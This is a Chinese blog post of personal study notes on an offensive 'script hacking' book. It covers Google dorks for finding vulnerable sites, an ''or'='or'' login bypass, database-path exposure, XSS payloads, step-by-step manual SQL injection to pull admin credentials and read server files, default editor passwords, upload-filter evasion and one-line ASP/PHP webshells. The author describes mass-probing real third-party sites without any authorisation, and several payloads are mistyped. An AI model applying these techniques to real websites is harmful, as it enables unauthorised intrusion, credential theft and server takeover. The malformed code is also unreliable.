《精通脚本黑客》

接全文的超链接

备注:

1、前有 代表不具备理解能力的词语的解释
2、xxxx : 可以被替代的例子

第一章 本地服务器搭建

HTTP超文本传输协议
                   【 虚拟主机
Web服务器–
                   【 服务器托管

ASP 一种服务端脚本语言(位于服务器端的脚本运行环境)
ASP构建的网站,例http://www.xxx.com/article.asp?id=12

安装IIS

第二章 常规脚本漏洞演练

2.1 Google Hack

1、google hack:结合google语法和一些关键字对网站进行渗透
Footprinting(踩点)收集的信息:
(1)网站注册信息
(2)网管资料(网管:网络管理员)
(3)共享资料
(4)端口信息
(5)FTP资源(FTP:文件传输协议,在 网络 上进行文件传输的一套标准协议)
(6)网站拓扑结构:一种物理布局,能表示出 网络服务器 、工作站的网络配置和互相之间的连接
(7)网站URL地址结构
(URL组成:资源类型、存放资源的主机域名、资源文件名或者协议,主机,端口,路径)
(8)网站系统版本
(9)后台地址
(10)弱口令:容易被猜到或者被破解的指令

一、google hacking——google 的基本语法:

(被划掉的指代关键字)
1、intext: 验证码 4800 => 用户登录口
2、intitle: 后台管理 => 后台管理
3、cache:pku,edu.cn => 北京大学网站服务器缓存的内容
4、define : html => 查找定义
5、filetype: 文件名.后缀名 => 查找特定文件
6、info:关键字 => 基本信息
7、 inurl:关键字 => 含有关键字的url地址
8、link:关键字 => 与关键字做了链接的url地址(查询敏感信息)
9、site:域名 => 拓扑结构进行,是从一个延展到剩下的所有相关
10、relate:URL => 与之相关联的url,比如搜索清华会出现北大

其余不常用的关键字搜索:

二、google hacking——入侵

浏览器中输入 site:网站url inurl:php?id= 找到存在xx网站存在php?id=的网站,再逐一验证该网址是否存在注入漏洞,具体方法 在网址后面添加 and 1=1 和 and 1=2,如果两个页面显示不同,即为存在注入漏洞。(但是这里试的时候不行,所有找的的网址进去之后都,“您进入的网页不存在,即将返回主页”,我不理解。)

三、挖掘鸡的使用

[后期实践再补全这部分]

目录浏览漏洞

原因:网站被目录浏览,又可以搜索数据库链接文件,导致数据库物理路径泄露。
物理路径:硬盘上的文件路径)

常见目录浏览的网页:To parent directory parent directory // Last modified Description // 转到父目录 // index of /

搜索目录浏览的主要语法inurl , intitle , intext , site , filetype
常见的文件后缀:avi,bak,bmp,dll,exe,ini,mp3,rar,txt,wav,js,zip,chm

搜索特定的文件夹

搜索协议 常见的协议:TCP , IP , DNS , TENET
(协议分析网:协议分析网)

搜索域名后缀 常见的域名后缀 : com , net , mil , org , info …

肉鸡:(傀儡机)可以被黑客远程控制的机器,通常被用作DDOS攻击。
DDOS :(分布式拒绝服务)通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量的恶意行为。

google hacking 常用语句:

google hack 部分结束 /// 撒花撒花


2.2 ‘or’ = ‘or’ 经典漏洞攻击

1、‘or’='or’漏洞:主要出现在后台登陆上,不需要密码则可以进入后台管理系统。

用户名,密码均为 :'or'='or'(但我试了很多都受挫了,还有安全系统拦截我说不可以使用’or’='or’作为用户名)
(ps:inurl:admin/login.asp真的很好用!)

2.3 暴库漏洞攻击

webshell临时简介:一个asp或php木马后门,被放置到web目录。且只会在网站的web日志中留下一些数据提交记录。得到webshell后还有可能提高权限。

2.3.1 conn.asp暴库法

目的:暴露出数据库的绝对地址。

inurl:"conn.asp"搜索到具有暴库漏洞的网站

然后下载数据库,里面包含了被调用的数据库的路径及数据库名and on

2.3.2 %5c暴库法

方法:在网址的最后一个’ / ’改为‘%5c
dbpath=server.mappath(‘数据库地址’)
(将相对路径改为绝对路径)

2.4 cookies欺骗漏洞

cookie:一个文本文件,存储在本机,,随着用户请求和页面在web服务器与浏览器之间传递。每次访问网站的应用程序都会读取cookie信息。

花钱下载了桂林老兵,可以很方便的获取到网站的cookie,从而进行修改。

md获取不到,气死我了。我的问题,我太菜了。后期再战!(最主要上网也搜不到一个教程,无助了)

2.5 跨站漏洞(XSS)

原因:编写程序时对一些变量没有做充分的过滤,直接把用户提交的数据送到SQL语句里执行,导致用户可以提交一些特意构造的语句
利用跨站漏洞在JavaScript这种脚本代码里面输入恶意脚本代码,被执行后就变成了跨站攻击。

大多数存在于评论,交互多的网站。

2.5.1 一次跨站漏洞的发掘

1、查看网站结构,特别是那些会显示到页面上的用户输入信息。
2、输入跨站测试代码 <img src = javascript:alert("test")>进行测试
3、成功 弹出对话框 ”test“

2.5.3 再次挖掘中国博客网之跨站漏洞

由于博客的登录系统大改导致无法在博客网实践,所以直接搜索了XSS的具体用法。

· 利用xss弹出恶意警示框:

<script> alert("xss恶意警示框!") </scirpt>

· 无限刷新网页

<meta http-equiv="refresh" content="0;">`

刚刚翻博客看到了一句话,只能说,好样的!

注入漏洞

工具注入

前提:能够构造SQL语句来访问数据库,有数据和数据库交互的地方会发生SQL注入攻击。

【注入攻击工具:明小子(但是tmd我花了很多的钱还是没有下载到正确的程序,我真无语。)】

ASP:(动态服务器页面)一个服务器端脚本环境,用来创建动态交互式网页并建立强大的web应用程序。

简述一下使用明小子攻击的方法和过程吧还是(良心教程备份)

(无特定目标)
1、得到网站存在SQL注入的网址
2、利用Google hack技术批量搜索含有注入漏洞的网站inurl:asp:?id=
3、明小子操作

(存在特定目标)
1、利用google hack site:站点网址 inurl:asp:?id=
2、利用明小子操作

(工具注入待补充)

手动注入

access数据库 为例

1、在asp:?id=xxx后加上‘,如果报错则说明存在注入漏洞。下面是我的结果(很草,想骂人)

2、在网址后面输入 and 1=1 and 1=2,如果返回页面不同,则说明存在注入漏洞。
3、判断网站后台数据库的类型。
ACCESS数据库 => 关键字 “Microsoft JET Database
MSSQL => 关键字 “SQL Server”
4、(以ACCESS数据库为例)猜测数据库表名,在后面加上 and exists(select * from 表名) 或者 and exists(select count from 表名)

5、猜测列名,exists (select 列名 from 表名) 或者 exists(select count(列名) from 表名)

常见的表名为:

6、猜解列的长度,and (select top 1 len(列名) from 表名) >x => (变换x的值)
7、猜解列的内容(用户名和密码),and (select top 1 asc(mid(列名,列数N,1))from 表名)>x =>(top后的值是该列的第N行,x为ASCII码,列数N就是在这一列中的第几个数字)

MySQL数据库为例

1、确认数据库版本

and ord(mid(version(),1,1))>51/*

(返回正常说明是大于4.0的版本,报错则说明是小于4.0的版本)
1、又确认数据库版本 => /* !%20s*/ (返回错误则说明后台数据库位MySQL/* !4016%20s */ 报错说明不到该版本。
2、确定当前数据库的字段数目。(UNINON和order by)
2.1、UNINON(联合查询):(要求前面的SQL语句1和后面的SQL语句2中的字段数要相同)
2.2、order by:后加数字,提交的数字多则报错。
3、union查询来获取数据库表名

union select 字段数 from 表名

(注:字段数的书写是1,2,3,…字段数数目)

4、想获得什么信息就在某个字段的位置上获取,比如,

union select 1,version(),3,4,...

=> 数据库当前版本就会出现在字段2的位置;union select 1,2,username,4,… => 用户名就会出现在字段3的位置上。

union select 1,2,3,password,5,6,… from admin where id = 4 (这个数字是管理员的编号,是唯一的。)

MD5信息摘要算法:一种密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。

load_file():读取文件并返回文件内容为字符串。(数据库权限必须为root:超级管理员)

读取服务器内容:
1、判断是否有root权限 =>

and ord(mid(user(),1,1))=114/*

=> 返回正确则说明有root权限,错误则没有。

2、判断是否有读写文件的权限

and(select count(*) from MySQL.user)>0

3、读取数据库内容

union select 1,load_file(文件的十六位进制表示) from admin

2.7 文件包含漏洞

构成远程文件包含漏洞原因:PHP文件中的变量过滤不严,没有判断提交的参数是本地的还是远程主机上的。
攻击远程文件包含漏洞:指定远程主机上的文件作为参数来提交给变量执行,然后在文件里写入木马,就会被web权限成功执行。

exploit:一个漏洞攻击程序,利用它可以达到攻击的目的,而获得相应的权限。
! webshell:一种代码执行环境。

2.8 旁注攻击

旁注:利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。

! ewebeditor : 在线HTML编辑器

利用ewebeditor去实现旁注攻击
1、搜索使用ewebeditor的网站

ewebeditor inurl:admin_login.asp

2、使用原始用户名和密码登录后台。(原始用户名:admin 原始密码:admin或admin888)
3、如果不是原始用户名或者密码,则可以直接访问db目录下的数据库(数据库中会存在登录用户名和密码)

db/ewebeditor.mdb

查询域名

2.9 获取webshell的几种方法(这个跟书上不一样啦,面向百度编程)

webshell:一种脚本攻击工具。一个asp,php,jsp木马后门,与正常网页混在一起,使用web方式控制网站服务器。
webshell(个):一种环境,被用于网站管理,服务器管理等等。可以在线编辑网页脚本,查看数据库,执行任何程序命令,所以得到了webshell就相当于可以完全管理后台。

php是服务器脚本语言;JSP是服务器端编程技术

2.9.1 直接上传获取webshell

php和jsp程序常见,上传一个不会被过滤掉的asp程序,从而获取webshell

2.9.2 添加修改上传类型

asp会被过滤,asa或者asP可以添加。又或者是aaspsp,过滤了一个asp会显露出剩下的asp,从而获取webshell

2.9.3 利用后台管理功能写入webshell

在后台修改配置文件,写入后缀是asp文件。

2.9.4 写入过滤不完全(*)

一句话木马(分为服务端和客户端):一小段ASP代码(服务端)插入到网站中,让其可以在所要入侵的网站中执行,得到shell;然后让客户端(一个网页,一些源代码,通过篡改源代码找到webshell)连接服务端,上传一个大木马,得到webshell。

%ASP一句话木马:

ASP常见服务端:<%execute request("value")%>;<%execute request.form("value")%>;<%eval request("value")%>;<%On Error Resume Next execute request("value")%>.

Attention:
1、action的值是插入服务端代码的ASP文件的URL地址。
2、IP.writetext request(“value”)中的value和服务端的value相同。
3、客户端(大样)

把服务端插入到ASP文件中:
1、利用后台提供的功能(可以输入数据的地方)插入服务器。(友情连接,页面编辑,模块编辑)【要记住输入数据文件的URL地址】
2、通过暴库(或)得到网站数据库的绝对路径。(暴出的数据库必须以asp结尾)

%PHP一句话木马

服务端:<?request($_REQUEST['a']);?>;<?require($a);?>;<?@include(#_POST["a"]);?>

服务端插入到网站php文件中:
1、利用后台可以输入的的功能。
2、利用php网站中使用的文本数据库(数据库文件后缀为php)。

2.10 使用webshell及提升权限

2.10.1 webshell的基本使用方法

! FSO:文件系统对象。

2.10.2 webshell的提权


插入很长的一篇内容

一些漏洞的名称

1、A1-Injection / ==> 注入漏洞
2、HTML Injection - Reflected (GET ==> HTML注入GET请求
3、HTML Injection - Stored(Blog)

后续更新


未完待续,后期看心情补。

《精通脚本黑客》读本书吧相关推荐

  1. 精通脚本黑客--电骡下载

    <<精通脚本黑客>>文如其名,是一本集合了脚本环境和黑客知识的网络安全基础教程.本书在一个大的脚本环境下,向大家介绍了网站入侵.各种常见脚本语言的基础学习.脚本程序漏洞分析与利 ...

  2. 精通脚本黑客读书笔记(一)

    算了只写这一次,跟着别人抄没意思浪费时间,也不可能在看 Google Hack 1.intext: 关键字.allintext:关键字 把网页正文中某个关键字做为搜索条件,然后搜索全世界网页正文中含有 ...

  3. linux从入门到精通脚本之家,Linux服务器从入门到精通52问_LINUX技术_操作系统_脚本之家.pdf...

    服务器从入门到精通 问 Linux 52 来源:互联网 作者:佚名 时间:11-05 15:08 :26 [大中小] 点评:本文为 服务器从入门到精通的 问 Linux 52 Q1 Linux的开发者 ...

  4. 网站安全编程 黑客入侵 脚本黑客 高级语法入侵 C/C++ C# PHP JSP 编程

    2019独角兽企业重金招聘Python工程师标准>>> 第一讲:网站安全编程 http://www.tudou.com/programs/view/GRT7IyMH3wM/ 第二讲: ...

  5. 批处理+Linux书籍+黑客编程+脚本攻防+逆向工程书籍+海量资源(pdf+chm电子书)

    TOOLS论坛内部文章打包.CHM http://yunfile.com/file/yunkey/0955157e/ 精通脚本黑客 http://yunfile.com/file/yunkey/636 ...

  6. 为了成为黑客,我的大学四年自学计算机之路是怎么过来的?

    毕业参加工作这几年,在不同的公司遇到过不同的团队,也认识了许多不同的人. 身边的同事经常问我:"你成都的啊,川大还是电子科大?" 每当这个时候,我就很尴尬了,心里问对方一句:成都难 ...

  7. 网络安全从入门到精通的学习资源汇总

    以上内容部分来源于网络,为提高大家安全学习的效率,我做了收录和整理.学习之路注定是孤独而寂寞,但是重要的是坚持以及对于安全的热情,引用黑哥的一句话:"整就牛!" 综合学习平台 ht ...

  8. 网络安全工程师入门教程(非常详细)从零基础入门到精通,看完这一篇就够了

    前言 想要成为网络安全工程师,却苦于没有方向,不知道从何学起的话,下面这篇 网络安全入门 教程可以帮你实现自己的网络安全工程师梦想,如果想学,可以继续看下去,文章有点长,希望你可以耐心看到最后! 1. ...

  9. 为什么黑客不黑/攻击赌博网站?如何入门黑客?

    攻击了,只是你不知道而已! 同样,对方也不会通知你,告诉你他黑了赌博网站. 攻击赌博网站的不一定是正义的黑客,也可能是因赌博输钱而误入歧途的法外狂徒.之前看过一个警方破获的真实案件:28岁小伙因赌博无 ...

  10. 还在自学黑客?一般人我劝你还是算了吧!

    写在开篇 笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室. 我为啥说自学黑客(网络安全),一般人我还是劝你算了吧 ...

最新文章

  1. 软件项目获取用户需求的沟通技巧(摘自IT168技术频道)
  2. C++自学笔记_文本查询程序_《C++ Primer》
  3. 负样本修正:CVR预估时间延迟问题
  4. [渝粤教育] 西南科技大学 机械制造装备及工艺 在线考试复习资料
  5. Ant步步为营(4)ant启动tomcat
  6. LoadRunner入门教程(4)—web性能测试常用指标
  7. PostgreSQL Json字段作为查询条件的解决方案
  8. Codeforces Round #309 (Div. 1) A(组合数学)
  9. 【转】移动前端工作的那些事---UE/UI架构原型搭建和前端设计之UE架构原型搭建...
  10. 如何使用Tipard 3D Converter转换2D视频格式
  11. Windows 10 下使用Git
  12. ResNet网络理解
  13. 解决打开一个excel文件,却出现两个窗口的办法
  14. 一文掌握项目经理和PMO线上会议汇报流程规范和注意事项
  15. LSTM调参经验(细读)
  16. 数据分析——两种求解R平方的方法
  17. 【python基础】python中的乌龟画图
  18. 算法练习贴--32--找不同(Java)
  19. stagefright,OpenMax框架
  20. 2021牛客暑期训练营1

热门文章

  1. 【6G】算力网络技术白皮书整理
  2. 云服务器部署网易云音乐API(node.js)
  3. 软件项目交付件模板整理清单
  4. laydate点击输入框闪一下不见了_解决layui laydate 时间控件一闪而过的问题
  5. 路畅安卓最新固件升级_路畅车载导航系统刷机-路畅导航系统刷机固件大全下载最新完整版-《百度网盘下载》西西软件下载...
  6. linux 系统如何启动服务,如何查看和停止Linux启动的服务
  7. AppScan下载安装教程
  8. Gridgen v15 中文教程
  9. VMWare mac os x 优化神器 beamoff
  10. 【FeignClient报错】Cannot deserialize value of type``from Object value (token `JsonToken.START_OBJECT`)